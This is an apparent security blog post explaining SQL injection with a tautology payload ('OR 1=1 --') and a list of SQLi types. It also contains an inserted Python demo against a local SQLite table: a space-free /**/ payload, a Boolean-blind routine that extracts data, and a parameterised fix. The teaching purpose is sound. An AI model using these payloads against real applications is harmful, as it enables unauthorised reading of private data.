
Exploiting SQL injection with no space

Gupta Bless
4 min read · Aug 29, 2020

With an exploitation scenario:

SQL Injection: a SQL injection (SQLi) attack injects SQL syntax into a query through user-supplied input to the application. A successful exploit can read sensitive data from the database, modify database data (INSERT/UPDATE/DELETE), and execute administrative operations on the database.

SQLi occurs when an application uses unvalidated user input to dynamically construct a SQL query.

Example: we want to retrieve data from a library application that publishes articles.

1) The application executes a SQL query that returns public articles. The URL looks like this: https://blog.test.com/articles.php?status=public, and it executes this query:

SELECT * FROM library WHERE category = 'articles' AND status = 'public'

2) The attacker wants to retrieve all articles (public and confidential), so he modifies the query simply by supplying an OR condition in the injected value, such as articles' OR 1=1 -- ', which turns the query into:

SELECT * FROM library WHERE category = 'articles' OR 1=1 -- ' AND status = 'public'

3) Since 1=1 is always true, and the -- comment discards the rest of the WHERE clause (including the status check), all articles (public and confidential) are retrieved.

Types:

In-band / Classic SQLi: the attacker uses the same communication channel to launch the attack and gather the results.

Error-based: this technique relies on the error messages thrown by the database server to obtain information about the structure of the database.

Union-based: this technique relies on the UNION SQL operator to combine the results of multiple SELECT statements into a single result set, which is returned as part of the HTTP response.

Inferential / Blind: in this technique the attacker sends payloads to the server and observes its responses and behaviour to learn about the database structure, since no data is returned directly.

Boolean-based: the attacker sends a query whose result depends on whether an injected condition is true or false. The content of the HTTP response changes or stays the same accordingly, so the attacker can infer the truth value of each condition and extract data one yes/no answer at a time.
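The three-step scenario above, together with the Boolean-blind variant from the Types list, as an added example that is not part of the original article. It uses Python's built-in sqlite3 module against a constructed library table (table and column names follow the article's query, the rows are made up). The vulnerable and parameterised search functions, the space-free payload (an empty block comment /**/ standing in for whitespace, which matches the post's title but is not shown in its text) and the blind extractor are all assumptions made here, not code from the author:

```python
import sqlite3

# Constructed sample data for the article's "library" table. The table and
# column names follow the article's query; the rows are made up for this demo.
SAMPLE_ROWS = [
    ("articles", "public", "Intro to SQL injection"),
    ("articles", "confidential", "Unreleased pentest report"),
    ("books", "public", "Web security handbook"),
]


def make_db():
    """In-memory SQLite database standing in for the blog's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE library (category TEXT, status TEXT, title TEXT)")
    conn.executemany("INSERT INTO library VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_search(conn, category, status):
    """Builds the query by string concatenation: the mistake the article describes."""
    sql = ("SELECT title FROM library WHERE category = '" + category
           + "' AND status = '" + status + "'")
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, category, status):
    """Same query with bound parameters: input stays data, never SQL syntax."""
    sql = "SELECT title FROM library WHERE category = ? AND status = ?"
    return [row[0] for row in conn.execute(sql, (category, status))]


# The article's payload. "--" starts a line comment, so the rest of the
# original WHERE clause (AND status = 'public') is thrown away.
PAYLOAD = "articles' OR 1=1 -- "

# Space-free variant (an assumption here, not shown in the article's text):
# an empty block comment /**/ separates tokens just like whitespace does.
PAYLOAD_NO_SPACE = "articles'/**/OR/**/1=1--"


def blind_oracle(conn, condition):
    """Boolean-blind probe: the vulnerable page lists articles only when the
    injected condition is true, which gives a one-bit yes/no answer."""
    probe = "articles' AND (" + condition + ") -- "
    return len(vulnerable_search(conn, probe, "public")) > 0


def blind_extract_confidential_title(conn):
    """Recover the confidential title from yes/no answers only: first count
    its length, then binary-search the code point of each character."""
    subq = "SELECT title FROM library WHERE status = 'confidential'"
    length = 0
    while blind_oracle(conn, f"length(({subq})) > {length}"):
        length += 1
    title = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII is assumed for the sample data
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(conn, f"unicode(substr(({subq}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        title += chr(lo)
    return title


def demo():
    conn = make_db()
    return {
        "normal": vulnerable_search(conn, "articles", "public"),
        "injected": vulnerable_search(conn, PAYLOAD, "public"),
        "injected_no_space": vulnerable_search(conn, PAYLOAD_NO_SPACE, "public"),
        "parameterised": safe_search(conn, PAYLOAD, "public"),
        "blind": blind_extract_confidential_title(conn),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:18} -> {result}")
```

Running it shows the normal request returning only the public article, both payloads returning every row in the table (the books row included, because OR 1=1 also bypasses the category check), the parameterised query returning nothing for the payload, and the blind extractor recovering the confidential title without it ever appearing in a response. Comment syntax is the one DBMS-specific detail to check: SQLite and PostgreSQL accept a bare --, whereas MySQL requires whitespace after -- and so usually gets # or /**/ in space-free payloads instead.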

Written by Gupta Bless

Security enthusiast working to secure web for others.